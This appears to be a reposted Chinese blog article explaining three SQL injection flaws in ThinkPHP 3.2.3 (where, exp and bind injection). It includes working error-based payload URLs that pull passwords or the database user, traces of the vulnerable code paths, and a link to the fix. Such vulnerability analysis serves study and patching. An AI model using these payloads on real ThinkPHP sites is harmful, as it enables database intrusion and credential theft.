<返回更多

ThinkPhp3漏洞原理分析总结

2020-05-06    
加入收藏

前言

Thinkphp是目前主流的一款php语言框架,但在使用中,也是产生了很多的高危漏洞。本文小编将从Thinkphp3说起,说明一些tp3框架的漏洞产生原理。使广大爱好者进一步深刻的理解框架。

 

环境搭建

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

Thinkphp3.2.3 where注入

?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)%23
ThinkPhp3漏洞原理分析总结

 

分析

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

id=1' -> I() -> find() -> __parseoptions() ->_parseType()

满足条件才能进去__parseOptions()方法

if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join']))
index.php?id[where]=3 and 1=1

修复

ThinkPhp3漏洞原理分析总结

 

Thinkphp 3.2.3 exp注入

ThinkPhp3漏洞原理分析总结

 

http://localhost:8888/tp3/index.php?username[0]=exp&username[1]==1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)
ThinkPhp3漏洞原理分析总结

 

分析

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

需要时数组才可以进去if语句
ThinkPhp3漏洞原理分析总结

 

 } elseif ('bind' == $exp) {
                    // 使用表达式
 $whereStr .= $key . ' = :' . $val[1];

修复

使用I方法接受会通过think_filter函数进行过滤

thinkphp 3.2.3 bind注入

index.php?id[0]=bind&id[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)&password=1
    public function index()
    {
        $User = M("Users");
        $user['id'] = I('id');
        $data['password'] = I('password');
        $valu = $User->where($user)->save($data);
        var_dump($valu);
    }

上文说到除了exp还有bind可以进行注入

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

ThinkPhp3漏洞原理分析总结

 

if (!empty($this->bind)) {
            $that           = $this;
            $this->queryStr = strtr($this->queryStr, array_map(function ($val) use ($that) {return ''' . $that->escapeString($val) . ''';}, $this->bind));
}
ThinkPhp3漏洞原理分析总结

 

修复

https://github.com/top-think/thinkphp/commit/7e47e34af72996497c90c20bcfa3b2e1cedd7fa4
ThinkPhp3漏洞原理分析总结

 

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>